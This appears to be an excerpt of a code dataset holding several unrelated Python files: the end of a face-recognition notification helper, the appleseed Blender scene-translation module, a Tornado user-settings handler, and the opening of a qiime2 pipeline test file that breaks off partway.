cv2.imwrite(image_link, frame)\n except:\n print(\"Imwrite error in autoface.createData function.\")\n predict_data = {\n \"time\": created_time,\n 'face_class': pred_clsname,\n 'prob': float(max_prob),\n 'image_link': image_link\n }\n \n # wait 1 seconds to save next image\n next_time_can_save_img = datetime.now() + timedelta(seconds=1)\n return next_time_can_save_img, predict_data\n\n def save_and_noti(self, frame, pred_clsname, max_prob):\n next_time_can_save_img, predict_data = self.create_data(frame, pred_clsname, max_prob)\n self.save(predict_data)\n\n if emailNotification.isNewDay(saved_day):\n # reset dict values\n for key in checkin:\n checkin[key] = False\n # renew saved_day\n saved_day = date.today()\n \n if checkin[pred_clsname] is False:\n checkin[pred_clsname] = True\n self.notifier.send_mail(frame, pred_clsname, prob)\n","sub_path":"utils/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"466891781","text":"#\n# This source file is part of appleseed.\n# Visit http://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2014-2018 The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport math\nimport os\n\nimport bpy\n\nimport appleseed as asr\nfrom .camera import CameraTranslator, InteractiveCameraTranslator\nfrom .group import GroupTranslator\nfrom .assethandlers import AssetHandler, CopyAssetsAssetHandler\nfrom .object import ArchiveTranslator, InstanceTranslator\nfrom .translator import ObjectKey, ProjectExportMode\nfrom .world import WorldTranslator\nfrom ..logger import get_logger\nfrom ..utils.util import Timer, inscenelayer\n\nlogger = get_logger()\n\n\nclass SceneTranslator(GroupTranslator):\n \"\"\"\n Class that translates a Blender scene to an appleseed project.\n \"\"\"\n\n #\n # Constants and settings.\n #\n\n OBJECT_TYPES_TO_IGNORE = {'ARMATURE'}\n\n #\n # Constructors.\n #\n\n @classmethod\n def create_project_export_translator(cls, scene, filename):\n \"\"\"\n Create a scene translator to export the scene to an appleseed project on disk.\n \"\"\"\n\n project_dir = os.path.dirname(filename)\n\n logger.debug(\"Creating texture and geometry directories in %s\", project_dir)\n\n geometry_dir = os.path.join(project_dir, \"_geometry\")\n textures_dir = os.path.join(project_dir, \"_textures\")\n\n if not os.path.exists(geometry_dir):\n os.makedirs(geometry_dir)\n\n if not os.path.exists(textures_dir):\n os.makedirs(textures_dir)\n\n logger.debug(\"Creating project export scene translator, filename: %s\", filename)\n\n asset_handler = CopyAssetsAssetHandler(project_dir, geometry_dir, textures_dir)\n\n return cls(\n scene,\n export_mode=ProjectExportMode.PROJECT_EXPORT,\n selected_only=scene.appleseed.export_selected,\n context=None,\n asset_handler=asset_handler)\n\n @classmethod\n def create_final_render_translator(cls, scene):\n \"\"\"\n Create a scene translator to export the scene to an in memory appleseed project.\n \"\"\"\n\n logger.debug(\"Creating final render scene translator\")\n\n asset_handler = AssetHandler()\n\n return cls(\n scene,\n export_mode=ProjectExportMode.FINAL_RENDER,\n selected_only=False,\n context=None,\n asset_handler=asset_handler)\n\n @classmethod\n def create_interactive_render_translator(cls, context):\n \"\"\"\n Create a scene translator to export the scene to an in memory appleseed project\n optimized 
for quick interactive edits.\n \"\"\"\n\n logger.debug(\"Creating interactive render scene translator\")\n\n asset_handler = AssetHandler()\n\n return cls(\n scene=context.scene,\n export_mode=ProjectExportMode.INTERACTIVE_RENDER,\n selected_only=False,\n context=context,\n asset_handler=asset_handler)\n\n def __init__(self, scene, export_mode, selected_only, context, asset_handler):\n \"\"\"\n Constructor. Do not use it to create instances of this class.\n Use the @classmethods instead.\n \"\"\"\n\n super(SceneTranslator, self).__init__(scene, export_mode, selected_only, asset_handler)\n\n self.__selected_only = selected_only\n\n self.__context = context\n\n self.__viewport_resolution = None\n\n # Translators.\n self.__world_translator = None\n self.__camera_translator = None\n self.__group_translators = {}\n\n self.__project = None\n\n #\n # Properties.\n #\n\n @property\n def bl_scene(self):\n \"\"\"\n Return the Blender scene.\n \"\"\"\n return self._bl_obj\n\n @property\n def as_project(self):\n \"\"\"\n Return the appleseed project.\n \"\"\"\n return self.__project\n\n @property\n def as_scene(self):\n \"\"\"\n Return the appleseed scene.\n \"\"\"\n return self.__project.get_scene()\n\n @property\n def selected_only(self):\n return self.__selected_only\n\n @property\n def camera_translator(self):\n return self.__camera_translator\n\n #\n # Scene Translation.\n #\n\n def translate_scene(self):\n \"\"\"\n Translate the Blender scene to an appleseed project.\n \"\"\"\n\n logger.debug(\"Translating scene %s\", self.bl_scene.name)\n\n prof_timer = Timer()\n prof_timer.start()\n\n self.__create_project()\n\n self.__create_translators()\n\n # Create appleseed entities for world and camera\n if self.__world_translator:\n self.__world_translator.create_entities(self.bl_scene)\n self.__camera_translator.create_entities(self.bl_scene)\n\n # Create entities for all mesh objects and lights in scene\n self._do_create_entities(self.bl_scene)\n\n # Create entities for any linked groups (libraries) in the scene\n for x in self.__group_translators.values():\n x.create_entities(self.bl_scene)\n\n self.__calc_motion_subframes()\n\n # Insert appleseed entities into the project.\n if self.__world_translator:\n self.__world_translator.flush_entities(self.as_scene)\n\n self.__camera_translator.flush_entities(self.as_scene)\n\n self._do_flush_entities(self.__main_assembly)\n\n for x in self.__group_translators.values():\n x.flush_entities(self.__main_assembly)\n\n self.__translate_render_settings()\n self.__translate_frame()\n\n self.__load_searchpaths()\n\n prof_timer.stop()\n logger.debug(\"Scene translated in %f seconds.\", prof_timer.elapsed())\n\n def write_project(self, filename):\n \"\"\"\n Write the appleseed project out to disk.\n \"\"\"\n\n asr.ProjectFileWriter().write(\n self.as_project,\n filename,\n asr.ProjectFileWriterOptions.OmitWritingGeometryFiles | asr.ProjectFileWriterOptions.OmitHandlingAssetFiles)\n\n # Interactive rendering update functions\n def update_scene(self, scene, context):\n \"\"\"\n Update the scene during interactive rendering.\n Scene updates are called whenever a parameter changes.\n \"\"\"\n\n # Set internal scene reference to current state of Blender scene\n logger.debug(\"Start scene update\")\n self._bl_obj = scene\n self.__context = context\n\n # Update materials.\n for mat in self._material_translators:\n # Get Blender material\n try:\n bl_mat = bpy.data.materials[str(mat)]\n except:\n logger.debug(\"Material not found for %s\", mat)\n continue\n\n # Check if base 
material is updated\n if bl_mat.is_updated or bl_mat.is_updated_data:\n logger.debug(\"Updating material %s\", mat)\n self._material_translators[mat].update(bl_mat, self.__main_assembly, scene)\n\n # Check if material node tree has been updated\n if bl_mat.appleseed.osl_node_tree is not None:\n if bl_mat.appleseed.osl_node_tree.is_updated:\n logger.debug(\"Updating material tree for %s\", mat)\n self._material_translators[mat].update(bl_mat, self.__main_assembly, scene)\n\n # Update lamp materials\n for mat in self._lamp_material_translators:\n # Get Blender lamp\n try:\n bl_lamp = bpy.data.lamps[str(mat)]\n except:\n logger.debug(\"Material not found for %s\", mat)\n continue\n if bl_lamp.appleseed.osl_node_tree.is_updated or bl_lamp.is_updated:\n logger.debug(\"Updating material tree for %s\", mat)\n self._lamp_material_translators[mat].update(bl_lamp, self.__main_assembly, scene)\n\n # Update objects\n for translator in self._object_translators:\n try:\n bl_obj = bpy.data.objects[str(translator)]\n\n if bl_obj.is_updated or bl_obj.is_updated_data:\n logger.debug(\"Updating object %s\", translator)\n self._object_translators[translator].update(bl_obj)\n except:\n logger.debug(\"Object not found for %s\", translator)\n\n for translator in self._dupli_translators:\n try:\n bl_obj = bpy.data.objects[str(translator)]\n\n if bl_obj.is_updated or bl_obj.is_updated_data:\n logger.debug(\"Updating dupli object %s\", translator)\n\n self._dupli_translators[translator].update(bl_obj, self.bl_scene)\n except Exception as e:\n logger.debug(\"Dupli object not found for %s, exception: %s\", translator, e)\n\n for translator in self._lamp_translators:\n try:\n bl_lamp = bpy.data.objects[str(translator)]\n\n if bl_lamp.is_updated or bl_lamp.is_updated_data:\n logger.debug(\"Updating lamp %s\", translator)\n self._lamp_translators[translator].update(bl_lamp, self.__main_assembly, scene)\n except:\n logger.debug(\"Lamp not found for %s\", translator)\n\n if self.bl_scene.world.is_updated or self.bl_scene.world.is_updated_data:\n self.__world_translator.update(self.bl_scene, self.as_scene)\n\n if self.bl_scene.camera.is_updated or self.bl_scene.camera.is_updated_data:\n self.__camera_translator.update(self.as_scene, camera=self.bl_scene.camera, context=self.__context)\n\n self.__camera_translator.set_transform(0.0)\n\n def check_view(self, context):\n \"\"\"\n Check the viewport to see if it has changed camera position or window size.\n For whatever reason, these changes do not trigger an update request so we must check things manually.\n \"\"\"\n\n view_update = False\n self.__context = context\n\n # Check if the camera needs to be updated\n cam_param_update, cam_translate_update = self.__camera_translator.check_for_camera_update(self.bl_scene.camera, self.__context)\n\n # Check if the frame needs to be updated\n width = int(self.__context.region.width)\n height = int(self.__context.region.height)\n new_viewport_resolution = [width, height]\n if new_viewport_resolution != self.__viewport_resolution:\n view_update = True\n cam_param_update = True\n\n return view_update, cam_param_update, cam_translate_update\n\n def update_view(self, view_update, cam_param_update):\n \"\"\"\n Update the viewport window during interactive rendering. 
The viewport update is triggered\n automatically following a scene update, or when the check view function returns true on any of its checks.\n \"\"\"\n\n logger.debug(\"Begin view update\")\n\n if cam_param_update:\n self.__camera_translator.update(self.as_scene)\n\n if view_update:\n self.__translate_frame()\n\n self.__camera_translator.set_transform(0.0)\n\n #\n # Internal methods.\n #\n\n def __create_project(self):\n \"\"\"\n Create a default empty project.\n \"\"\"\n\n logger.debug(\"Creating appleseed project\")\n\n self.__project = asr.Project(self.bl_scene.name)\n\n # Render settings.\n self.__project.add_default_configurations()\n\n # Create the scene.\n self.__project.set_scene(asr.Scene())\n\n # Create the environment.\n self.__project.get_scene().set_environment(asr.Environment(\"environment\", {}))\n\n # Create the main assembly.\n self.__project.get_scene().assemblies().insert(asr.Assembly(\"assembly\", {}))\n self.__main_assembly = self.__project.get_scene().assemblies()[\"assembly\"]\n\n # Instance the main assembly.\n assembly_inst = asr.AssemblyInstance(\"assembly_inst\", {}, \"assembly\")\n assembly_inst.transform_sequence().set_transform(0.0, asr.Transformd(asr.Matrix4d.identity()))\n self.__project.get_scene().assembly_instances().insert(assembly_inst)\n\n # Create default materials.\n self.__create_default_material()\n self.__create_null_material()\n\n def __create_world_translator(self):\n logger.debug(\"Creating world translator\")\n\n self.__world_translator = WorldTranslator(self.bl_scene, self.asset_handler)\n\n def __create_translators(self):\n \"\"\"\n Create translators for each Blender object. These translators contain all the functions and information\n necessary to convert Blender objects, lights, cameras and materials into equivalent appleseed entities.\n \"\"\"\n\n if self.bl_scene.world.appleseed_sky.env_type != 'none':\n self.__create_world_translator()\n\n # Create translators for all objects in the scene.\n super(SceneTranslator, self)._create_translators(self.bl_scene)\n\n # Always create a translator for the active camera even if it is not visible or renderable.\n if self.bl_scene.camera:\n obj_key = ObjectKey(self.bl_scene.camera)\n logger.debug(\"Creating camera translator for active camera %s\", obj_key)\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n self.__camera_translator = CameraTranslator(self.bl_scene.camera, self.asset_handler)\n else:\n self.__camera_translator = InteractiveCameraTranslator(self.bl_scene.camera, self.__context, self.asset_handler)\n else:\n # Create dummy camera for interactive mode\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER:\n self.__camera_translator = InteractiveCameraTranslator(None, self.__context, self.asset_handler)\n\n for obj in self.bl_scene.objects:\n\n # Skip object types that are not renderable.\n if obj.type in SceneTranslator.OBJECT_TYPES_TO_IGNORE:\n logger.debug(\"Ignoring object %s of type %s\", obj.name, obj.type)\n continue\n\n if obj.hide_render:\n continue\n\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER and obj.hide:\n continue\n\n if not inscenelayer(obj, self.bl_scene):\n logger.debug(\"skipping invisible object %s\", obj.name)\n continue\n\n if self.selected_only and not obj.select:\n continue\n\n obj_key = ObjectKey(obj)\n\n if obj.type == 'EMPTY':\n if obj.is_duplicator and obj.dupli_type == 'GROUP':\n group = obj.dupli_group\n\n group_key = ObjectKey(group)\n\n # Create a translator for the group if needed.\n if not group_key in 
self.__group_translators:\n logger.debug(\"Creating group translator for group %s\", group_key)\n self.__group_translators[group_key] = GroupTranslator(group, self.export_mode, False, self.asset_handler)\n\n # Instance the group into the scene.\n logger.debug(\"Creating group instance translator for object %s\", obj.name)\n self._object_translators[obj_key] = InstanceTranslator(obj, self.__group_translators[group_key], self.asset_handler)\n\n if obj.appleseed.object_export != 'normal':\n logger.debug(\"Creating archive translator for object %s\", obj_key)\n archive_path = obj.appleseed.archive_path\n self._object_translators[obj_key] = ArchiveTranslator(obj, archive_path, self._asset_handler)\n\n def __calc_motion_subframes(self):\n \"\"\"Calculates subframes for motion blur. Each blur type can have it's own segment count, so the final list\n created has every transform time needed. This way we only have to move the frame set point one time, instead of the dozens\n and dozens of times the old exporter did (yay for progress).\n \"\"\"\n cam_times = {0.0}\n xform_times = {0.0}\n deform_times = {0.0}\n\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n shutter_length = self.bl_scene.appleseed.shutter_close - self.bl_scene.appleseed.shutter_open\n\n if self.bl_scene.appleseed.enable_camera_blur:\n self.__get_subframes(shutter_length, self.bl_scene.appleseed.camera_blur_samples, cam_times)\n\n if self.bl_scene.appleseed.enable_object_blur:\n self.__get_subframes(shutter_length, self.bl_scene.appleseed.object_blur_samples, xform_times)\n\n if self.bl_scene.appleseed.enable_deformation_blur:\n self.__get_subframes(shutter_length, self.__round_up_pow2(self.bl_scene.appleseed.deformation_blur_samples), deform_times)\n\n # Merge all subframe times\n all_times = set()\n all_times.update(cam_times)\n all_times.update(xform_times)\n all_times.update(deform_times)\n all_times = sorted(list(all_times))\n current_frame = self.bl_scene.frame_current\n\n for time in all_times:\n new_frame = current_frame + time\n int_frame = math.floor(new_frame)\n subframe = new_frame - int_frame\n\n self.bl_scene.frame_set(int_frame, subframe=subframe)\n\n if time in cam_times:\n self.__camera_translator.set_transform_key(self.bl_scene, time, cam_times)\n\n if time in xform_times:\n self.set_transform_key(self.bl_scene, time, xform_times)\n\n for x in self.__group_translators.values():\n x.set_transform_key(self.bl_scene, time, xform_times)\n\n if time in deform_times:\n self.set_deform_key(self.bl_scene, time, deform_times)\n\n for x in self.__group_translators.values():\n x.set_deform_key(self.bl_scene, time, deform_times)\n\n self.bl_scene.frame_set(current_frame)\n\n def __get_subframes(self, shutter_length, samples, times):\n assert samples > 1\n\n segment_size = shutter_length / (samples - 1)\n\n for seg in range(0, samples):\n times.update({self.bl_scene.appleseed.shutter_open + (seg * segment_size)})\n\n def __create_default_material(self):\n logger.debug(\"Creating default material\")\n\n surface_shader = asr.SurfaceShader(\"diagnostic_surface_shader\", \"__default_surface_shader\", {'mode': 'facing_ratio'})\n material = asr.Material('generic_material', \"__default_material\", {'surface_shader': '__default_surface_shader'})\n\n self.__main_assembly.surface_shaders().insert(surface_shader)\n self.__main_assembly.materials().insert(material)\n\n def __create_null_material(self):\n logger.debug(\"Creating null material\")\n\n material = asr.Material('generic_material', \"__null_material\", {})\n 
self.__main_assembly.materials().insert(material)\n\n def __translate_render_settings(self):\n \"\"\"\n Convert render settings (AA samples, lighting engine, ...) to appleseed properties.\n \"\"\"\n\n logger.debug(\"Translating render settings\")\n\n scene = self.bl_scene\n asr_scene_props = scene.appleseed\n\n conf_final = self.as_project.configurations()['final']\n conf_interactive = self.as_project.configurations()['interactive']\n\n lighting_engine = asr_scene_props.lighting_engine if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER else 'pt'\n\n if self.__context:\n number_of_pixels = int(self.__context.region.width) * int(self.__context.region.height) * asr_scene_props.interactive_max_samples\n else:\n number_of_pixels = -1\n\n tile_renderer = 'adaptive' if asr_scene_props.pixel_sampler == 'adaptive' else 'generic'\n pixel_renderer = '' if asr_scene_props.pixel_sampler == 'adaptive' else 'uniform'\n\n parameters = {'uniform_pixel_renderer': {'decorrelate_pixels': True if asr_scene_props.decorrelate_pixels else False,\n 'force_antialiasing': True if asr_scene_props.force_aa else False,\n 'samples': asr_scene_props.samples},\n 'adaptive_tile_renderer': {'min_samples': asr_scene_props.adaptive_min_samples,\n 'noise_threshold': asr_scene_props.adaptive_noise_threshold,\n 'batch_size': asr_scene_props.adaptive_batch_size,\n 'max_samples': asr_scene_props.adaptive_max_samples},\n 'use_embree': asr_scene_props.use_embree,\n 'pixel_renderer': pixel_renderer,\n 'lighting_engine': lighting_engine,\n 'tile_renderer': tile_renderer,\n 'passes': asr_scene_props.renderer_passes,\n 'generic_frame_renderer': {'tile_ordering': asr_scene_props.tile_ordering},\n 'progressive_frame_renderer': {'max_samples': number_of_pixels,\n 'max_fps': asr_scene_props.interactive_max_fps},\n 'light_sampler': {'algorithm': asr_scene_props.light_sampler,\n 'enable_light_importance_sampling': asr_scene_props.enable_light_importance_sampling},\n 'shading_result_framebuffer': \"permanent\" if asr_scene_props.renderer_passes > 1 else \"ephemeral\"}\n\n if self.export_mode != ProjectExportMode.PROJECT_EXPORT:\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER:\n render_threads = -2\n else:\n render_threads = asr_scene_props.threads if not asr_scene_props.threads_auto else 'auto'\n parameters['rendering_threads'] = render_threads\n parameters['texture_store'] = {'max_size': asr_scene_props.tex_cache * 1024 * 1024}\n\n if lighting_engine == 'pt':\n parameters['pt'] = {'enable_ibl': True if asr_scene_props.enable_ibl else False,\n 'enable_dl': True if asr_scene_props.enable_dl else False,\n 'enable_caustics': True if scene.appleseed.enable_caustics else False,\n 'clamp_roughness': True if scene.appleseed.enable_clamp_roughness else False,\n 'record_light_paths': True if scene.appleseed.record_light_paths else False,\n 'next_event_estimation': True,\n 'rr_min_path_length': asr_scene_props.rr_start,\n 'optimize_for_lights_outside_volumes': asr_scene_props.optimize_for_lights_outside_volumes,\n 'volume_distance_samples': asr_scene_props.volume_distance_samples,\n 'dl_light_samples': asr_scene_props.dl_light_samples,\n 'ibl_env_samples': asr_scene_props.ibl_env_samples,\n 'dl_low_light_threshold': asr_scene_props.dl_low_light_threshold,\n 'max_diffuse_bounces': asr_scene_props.max_diffuse_bounces if not asr_scene_props.max_diffuse_bounces_unlimited else -1,\n 'max_glossy_bounces': asr_scene_props.max_glossy_brdf_bounces if not asr_scene_props.max_glossy_brdf_bounces_unlimited else -1,\n 'max_specular_bounces': 
asr_scene_props.max_specular_bounces if not asr_scene_props.max_specular_bounces_unlimited else -1,\n 'max_volume_bounces': asr_scene_props.max_volume_bounces if not asr_scene_props.max_volume_bounces_unlimited else -1,\n 'max_bounces': asr_scene_props.max_bounces if not asr_scene_props.max_bounces_unlimited else -1}\n if not asr_scene_props.max_ray_intensity_unlimited:\n parameters['pt']['max_ray_intensity'] = asr_scene_props.max_ray_intensity\n else:\n parameters['sppm'] = {'alpha': asr_scene_props.sppm_alpha,\n 'dl_mode': asr_scene_props.sppm_dl_mode,\n 'enable_caustics': \"true\" if asr_scene_props.enable_caustics else \"false\",\n 'env_photons_per_pass': asr_scene_props.sppm_env_photons,\n 'initial_radius': asr_scene_props.sppm_initial_radius,\n 'light_photons_per_pass': asr_scene_props.sppm_light_photons,\n\n # Leave at 0 for now - not in appleseed.studio GUI\n 'max_path_length': 0,\n 'max_photons_per_estimate': asr_scene_props.sppm_max_per_estimate,\n 'path_tracing_max_path_length': asr_scene_props.sppm_pt_max_length,\n 'path_tracing_rr_min_path_length': asr_scene_props.sppm_pt_rr_start,\n 'photon_tracing_max_path_length': asr_scene_props.sppm_photon_max_length,\n 'photon_tracing_rr_min_path_length': asr_scene_props.sppm_photon_rr_start}\n if not asr_scene_props.sppm_pt_max_ray_intensity_unlimited:\n parameters['sppm']['path_tracing_max_ray_intensity'] = asr_scene_props.sppm_pt_max_ray_intensity\n\n if asr_scene_props.shading_override:\n parameters['shading_engine'] = {'override_shading': {'mode': asr_scene_props.override_mode}}\n \n conf_final.set_parameters(parameters)\n\n parameters['lighting_engine'] = 'pt'\n conf_interactive.set_parameters(parameters)\n\n def __translate_frame(self):\n \"\"\"\n Convert image related settings (resolution, crop windows, AOVs, ...) 
to appleseed.\n \"\"\"\n\n logger.debug(\"Translating frame\")\n\n camera_name = self.bl_scene.camera.name if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER else \"interactive_camera\"\n\n asr_scene_props = self.bl_scene.appleseed\n scale = self.bl_scene.render.resolution_percentage / 100.0\n if self.__context:\n width = int(self.__context.region.width)\n height = int(self.__context.region.height)\n self.__viewport_resolution = [width, height]\n else:\n width = int(self.bl_scene.render.resolution_x * scale)\n height = int(self.bl_scene.render.resolution_y * scale)\n\n noise_seed = (asr_scene_props.noise_seed + self.bl_scene.frame_current) if asr_scene_props.per_frame_noise else asr_scene_props.noise_seed\n\n frame_params = {\n 'resolution': asr.Vector2i(width, height),\n 'camera': camera_name,\n 'tile_size': asr.Vector2i(asr_scene_props.tile_size, asr_scene_props.tile_size),\n 'filter': asr_scene_props.pixel_filter,\n 'filter_size': asr_scene_props.pixel_filter_size,\n 'denoiser': asr_scene_props.denoise_mode,\n 'noise_seed': noise_seed,\n 'skip_denoised': asr_scene_props.skip_denoised,\n 'random_pixel_order': asr_scene_props.random_pixel_order,\n 'prefilter_spikes': asr_scene_props.prefilter_spikes,\n 'spike_threshold': asr_scene_props.spike_threshold,\n 'patch_distance_threshold': asr_scene_props.patch_distance_threshold,\n 'denoise_scales': asr_scene_props.denoise_scales,\n 'mark_invalid_pixels': asr_scene_props.mark_invalid_pixels}\n\n # AOVs\n aovs = asr.AOVContainer()\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n if asr_scene_props.albedo_aov:\n aovs.insert(asr.AOV('albedo_aov', {}))\n if asr_scene_props.depth_aov:\n aovs.insert(asr.AOV('depth_aov', {}))\n if asr_scene_props.diffuse_aov:\n aovs.insert(asr.AOV('diffuse_aov', {}))\n if asr_scene_props.direct_diffuse_aov:\n aovs.insert(asr.AOV('direct_diffuse_aov', {}))\n if asr_scene_props.direct_glossy_aov:\n aovs.insert(asr.AOV('direct_glossy_aov', {}))\n if asr_scene_props.emission_aov:\n aovs.insert(asr.AOV('emission_aov', {}))\n if asr_scene_props.glossy_aov:\n aovs.insert(asr.AOV('glossy_aov', {}))\n if asr_scene_props.indirect_diffuse_aov:\n aovs.insert(asr.AOV('indirect_diffuse_aov', {}))\n if asr_scene_props.indirect_glossy_aov:\n aovs.insert(asr.AOV('indirect_glossy_aov', {}))\n if asr_scene_props.invalid_samples_aov:\n aovs.insert(asr.AOV('invalid_samples_aov', {}))\n if asr_scene_props.normal_aov:\n aovs.insert(asr.AOV('normal_aov', {}))\n if asr_scene_props.npr_contour_aov:\n aovs.insert(asr.AOV('npr_contour_aov', {}))\n if asr_scene_props.npr_shading_aov:\n aovs.insert(asr.AOV('npr_shading_aov', {}))\n if asr_scene_props.pixel_sample_count_aov:\n aovs.insert(asr.AOV('pixel_sample_count_aov', {}))\n if asr_scene_props.pixel_time_aov:\n aovs.insert(asr.AOV('pixel_time_aov', {}))\n if asr_scene_props.pixel_variation_aov:\n aovs.insert(asr.AOV('pixel_variation_aov', {})) \n if asr_scene_props.position_aov:\n aovs.insert(asr.AOV('position_aov', {}))\n if asr_scene_props.screen_space_velocity_aov:\n aovs.insert(asr.AOV('screen_space_velocity_aov', {}))\n if asr_scene_props.uv_aov:\n aovs.insert(asr.AOV('uv_aov', {}))\n\n # Create and set the frame in the project.\n frame = asr.Frame(\"beauty\", frame_params, aovs)\n\n if len(asr_scene_props.post_processing_stages) > 0 and self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n for index, stage in enumerate(asr_scene_props.post_processing_stages):\n if stage.model == 'render_stamp_post_processing_stage':\n params = {'order': index,\n 
'format_string': stage.render_stamp}\n else:\n params = {'order': index,\n 'color_map': stage.color_map,\n 'auto_range': stage.auto_range,\n 'range_min': stage.range_min,\n 'range_max': stage.range_max,\n 'add_legend_bar': stage.add_legend_bar,\n 'legend_bar_ticks': stage.legend_bar_ticks,\n 'render_isolines': stage.render_isolines,\n 'line_thickness': stage.line_thickness}\n\n if stage.color_map == 'custom':\n params['color_map_file_path'] = stage.color_map_file_path\n\n post_process = asr.PostProcessingStage(stage.model,\n stage.name,\n params)\n\n frame.post_processing_stages().insert(post_process)\n\n if self.bl_scene.render.use_border and self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n min_x = int(self.bl_scene.render.border_min_x * width)\n max_x = int(self.bl_scene.render.border_max_x * width) - 1\n min_y = height - int(self.bl_scene.render.border_max_y * height)\n max_y = height - int(self.bl_scene.render.border_min_y * height) - 1\n frame.set_crop_window([min_x, min_y, max_x, max_y])\n\n elif self.export_mode == ProjectExportMode.INTERACTIVE_RENDER and self.__context.space_data.use_render_border \\\n and self.__context.region_data.view_perspective in ('ORTHO', 'PERSP'):\n min_x = int(self.__context.space_data.render_border_min_x * width)\n max_x = int(self.__context.space_data.render_border_max_x * width) - 1\n min_y = height - int(self.__context.space_data.render_border_max_y * height)\n max_y = height - int(self.__context.space_data.render_border_min_y * height) - 1\n frame.set_crop_window([min_x, min_y, max_x, max_y])\n\n self.__project.set_frame(frame)\n\n def __load_searchpaths(self):\n paths = self.__project.get_search_paths()\n\n # Load any search paths from asset handler\n paths.extend(x for x in self.asset_handler.searchpaths if x not in paths)\n\n self.__project.set_search_paths(paths)\n\n @staticmethod\n def __round_up_pow2(x):\n assert (x >= 2)\n return 1 << (x - 1).bit_length()\n","sub_path":"translators/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":33906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
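# A standalone sketch of the subframe merging done by __calc_motion_subframes in the
# scene.py record above: each blur type contributes evenly spaced sample times across
# the shutter interval, and the sorted union means the Blender frame pointer is moved
# only once per unique time. Shutter values and sample counts below are illustrative.

def subframe_times(shutter_open, shutter_length, samples):
    assert samples > 1
    step = shutter_length / (samples - 1)
    return {shutter_open + i * step for i in range(samples)}

cam_times = subframe_times(0.0, 1.0, 2)     # {0.0, 1.0}
xform_times = subframe_times(0.0, 1.0, 3)   # {0.0, 0.5, 1.0}
deform_times = subframe_times(0.0, 1.0, 2)  # deformation counts are rounded up to a power of two
all_times = sorted(cam_times | xform_times | deform_times)
print(all_times)  # [0.0, 0.5, 1.0] -> one frame_set() call per unique time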
+{"seq_id":"467760547","text":"import tornado.web\nfrom base import BaseHandler\n\nclass SettingHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self, *args, **kwargs):\n self.render(\"settings.html\",title=\"Setting\",current_user=self.get_User(),messgae='')\n\n\n @tornado.web.authenticated\n def post(self, *args, **kwargs):\n try:\n name=self.get_argument('name')\n email=self.get_argument('email')\n blogUrl=self.get_argument('blog')\n except:\n self.render(\"setting.html\",title=\"Setting\",current_user=self.get_User(),message=\"you should fill all fields\")\n return\n coll=self.get_database()\n user=coll.find_one({'username':self.get_current_user()})\n _user=user['User']\n _user.update(name=name,email=email,blog=blogUrl)\n coll.update_many({'username':self.get_current_user()},{'$set':{'User':_user}})\n self.render(\"settings.html\",title=\"Setting\",current_user=self.get_User(),messgae='save successful')\n\n\n","sub_path":"Q_and_A_website/handlers/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"126353972","text":"from .setup import TestCase\r\nfrom qiime2_pipeline.denoise import Dada2PairedEnd, Dada2SingleEnd\r\nfrom qiime2_pipeline.concat import Concat, BatchConcat, Pool, BatchPool\r\nfrom qiime2_pipeline.importing import ImportPairedEndFastq, ImportSingleEndFastq\r\n\r\n\r\nclass MyTest(TestCase):\r\n\r\n def setUp(self):\r\n self.set_up(py_path=__file__)\r\n\r\n def tearDown(self):\r\n self.tear_down()\r\n\r\n def __test_concat(self):\r\n actual = Concat(self.settings).main(\r\n fq1=f'{self.indir}/R1.fastq.gz',\r\n fq2=f'{self.indir}/R2.fastq.gz'\r\n )\r\n expected = f'{self.workdir}/concat.fq'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_batch_concat(self):\r\n fq_dir, fq_suffix = BatchConcat(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n self.assertFileExists(f'{self.workdir}/concat_fastqs', fq_dir)\r\n self.assertEqual('.fq', fq_suffix)\r\n\r\n def __test_pool(self):\r\n actual = Pool(self.settings).main(\r\n fq1=f'{self.indir}/R1.fastq.gz',\r\n fq2=f'{self.indir}/R2.fastq.gz'\r\n )\r\n expected = f'{self.workdir}/pool.fq'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_batch_pool(self):\r\n fq_dir, fq_suffix = BatchPool(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n 